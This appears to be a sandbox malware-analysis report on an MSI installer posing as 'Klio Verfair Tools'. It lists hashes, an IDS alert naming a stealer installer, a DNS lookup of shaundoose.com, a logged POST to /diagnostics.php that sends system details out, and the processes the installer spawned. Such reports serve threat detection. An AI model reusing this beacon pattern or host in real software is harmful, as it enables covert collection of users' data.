                                                                                                                                                                                          SHA-256:763BD8FB55321BB49E5A7023FDE57BA879E4E39B6E21D0D3727CF08D3E0711FC
                                                                                                                                                                                          SHA-512:B7C91D781D98E78E1DDA47BB0790749E99F0567DD12AAC664829EF882E385ACA7D127894A22738BA30760A22D7B10D9AB0E927F40D09BB9681D80049F068B56C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                          Entropy (8bit):0.06919379217133059
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOcOQvPOIyVky6l3X:2F0i8n0itFzDHFcOaPX3X
                                                                                                                                                                                          MD5:FE65CA18FD80659152BC9C0E4513ED31
                                                                                                                                                                                          SHA1:342A3407A6044E6B469A1467C0C14259E745CFA2
                                                                                                                                                                                          SHA-256:1398E299833FB7909EB193DC24C7CBAC042DDAF68251996A45BE381C4031178F
                                                                                                                                                                                          SHA-512:BE17BDADEFFAF121085AA9927BD84C94A77DC27B80A13DCCAD5A5766B1126034DF45AA389C881DD840EE11F5A1F0DC640EFD25F3882FC2FB19C8D8F31DFC5637
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {5573CB6A-FBB7-4DDB-BB6F-286B726CF22B}, Number of Words: 10, Subject: Klio Verfair Tools, Author: TasovCoop, Name of Creating Application: Klio Verfair Tools, Template: ;1033, Comments: This installer database contains the logic and data required to install Klio Verfair Tools., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Sun Mar 23 16:43:52 2025, Last Saved Time/Date: Sun Mar 23 16:43:52 2025, Last Printed: Sun Mar 23 16:43:52 2025, Number of Pages: 450
                                                                                                                                                                                          Entropy (8bit):7.31982440208669
                                                                                                                                                                                          TrID:
                                                                                                                                                                                          • Windows SDK Setup Transform Script (63028/2) 88.73%
                                                                                                                                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 11.27%
                                                                                                                                                                                          File name:build.msi
                                                                                                                                                                                          File size:65'046'016 bytes
                                                                                                                                                                                          MD5:cc9a4fbbbabad106e40b7577f6dbbcc1
                                                                                                                                                                                          SHA1:4edf9195188e721a7b5f394032ddb987144f918e
                                                                                                                                                                                          SHA256:0b268732e81427c10afaa9679c60485a5c8a71c839f268b6e0e0d7c57efb3832
                                                                                                                                                                                          SHA512:059a987598cd67f4603ccdb1721e136890bc07da30527105e0a86bbf68bb657f1c9c32539e29d09524cb804496fd925931aa2efcf8a7d373f1ef71318c4546bc
                                                                                                                                                                                          SSDEEP:786432:D0zVmrjV7eIAtC9OTZm/lD0qKZIr6KmOwCHu5PVpraze:DSVmrjV7eI/9OTZ0PmOC5W
                                                                                                                                                                                          TLSH:94E77C01B3FA4148F2F75EB17EBA45A594BABD521B30C0EF1204660E1B72BC25BB5763
                                                                                                                                                                                          Icon Hash:2d2e3797b32b2b99


Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-03-25T21:01:49.311225+0100 | 2829202 | ETPRO MALWARE MSIL/Zbrain PUP/Stealer Installer UA | 1 | 192.168.2.5 | 49721 | 104.21.64.101 | 443 | TCP
                                                                                                                                                                                          • Total Packets: 11
                                                                                                                                                                                          • 443 (HTTPS)
                                                                                                                                                                                          • 53 (DNS)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 25, 2025 21:01:48.920177937 CET | 58989 | 53 | 192.168.2.5 | 1.1.1.1
Mar 25, 2025 21:01:49.028214931 CET | 53 | 58989 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 25, 2025 21:01:48.920177937 CET | 192.168.2.5 | 1.1.1.1 | 0x2feb | Standard query (0) | shaundoose.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 25, 2025 21:01:49.028214931 CET | 1.1.1.1 | 192.168.2.5 | 0x2feb | No error (0) | shaundoose.com | | 104.21.64.101 | A (IP address) | IN (0x0001) | false
Mar 25, 2025 21:01:49.028214931 CET | 1.1.1.1 | 192.168.2.5 | 0x2feb | No error (0) | shaundoose.com | | 172.67.181.22 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                          • shaundoose.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49721 | 104.21.64.101 | 443 | 8376 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-25 20:01:49 UTC | 196 | OUT | POST /diagnostics.php HTTP/1.1
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                                                                                                                                          User-Agent: AdvancedInstaller
                                                                                                                                                                                          Host: shaundoose.com
                                                                                                                                                                                          Content-Length: 53
                                                                                                                                                                                          Cache-Control: no-cache
2025-03-25 20:01:49 UTC | 53 | OUT | Data Raw: 44 61 74 65 3d 32 35 25 32 46 30 33 25 32 46 32 30 32 35 26 44 69 73 6b 50 72 6f 6d 70 74 3d 25 35 42 31 25 35 44 26 56 65 72 73 69 6f 6e 4e 54 3d 31 30 30 30
                                                                                                                                                                                          Data Ascii: Date=25%2F03%2F2025&DiskPrompt=%5B1%5D&VersionNT=1000
2025-03-25 20:01:50 UTC | 845 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                          Date: Tue, 25 Mar 2025 20:01:50 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: no-store
                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bPaEVFNOQSXoRafSpHq2TIJy4i2m%2F3ozpLl%2FHBbEcioaW5fuKtreo%2BxHfxBROv7dKQyeTXJ9zLl3fyPpEWLg1i7c6MRm%2FTEiR4Yov%2FzHmSw5eHiSkkQ1qi9kiEriT4vmdg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 9261009c09c2c674-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=100598&min_rtt=99906&rtt_var=21793&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=909&delivery_rate=37287&cwnd=238&unsent_bytes=0&cid=ab5a8d8c329be8c5&ts=1307&x=0"
2025-03-25 20:01:50 UTC | 6 | IN | Data Raw: 31 0d 0a 30 0d 0a
                                                                                                                                                                                          Data Ascii: 10
2025-03-25 20:01:50 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 0



                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                          Start time:16:01:42
                                                                                                                                                                                          Start date:25/03/2025
                                                                                                                                                                                          Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\build.msi"
                                                                                                                                                                                          Imagebase:0x7ff79ef00000
                                                                                                                                                                                          File size:69'632 bytes
                                                                                                                                                                                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                          Start time:16:01:43
                                                                                                                                                                                          Start date:25/03/2025
                                                                                                                                                                                          Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                          Imagebase:0x7ff79ef00000
                                                                                                                                                                                          File size:69'632 bytes
                                                                                                                                                                                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                          Start time:16:01:47
                                                                                                                                                                                          Start date:25/03/2025
                                                                                                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 6E1DB9555CE64326EDD6942FBB93A68E
                                                                                                                                                                                          Imagebase:0xf10000
                                                                                                                                                                                          File size:59'904 bytes
                                                                                                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                          Start time:16:02:00
                                                                                                                                                                                          Start date:25/03/2025
                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exe"
                                                                                                                                                                                          Imagebase:0x7ff735da0000
                                                                                                                                                                                          File size:16'065'496 bytes
                                                                                                                                                                                          MD5 hash:C02DC2CA96FE9841963883C0FE177399
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2598148437.00007FF735DA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff735da0000_launcher.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                          • Opcode ID: 3be227cb8252aac31629724096c608187ebffdc99491d3ac1e2d2a14734ec97e
                                                                                                                                                                                          • Instruction ID: 81103fe5eae4f231ede8f8f139dfed694abbcc42c387d9817b6cca9ccf4ac8b4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3be227cb8252aac31629724096c608187ebffdc99491d3ac1e2d2a14734ec97e
                                                                                                                                                                                          • Instruction Fuzzy Hash: DC11AC22B14F059AFB00DF60EC446B973A4FB48B28F840E35EA6D46BA4DF78D1A48350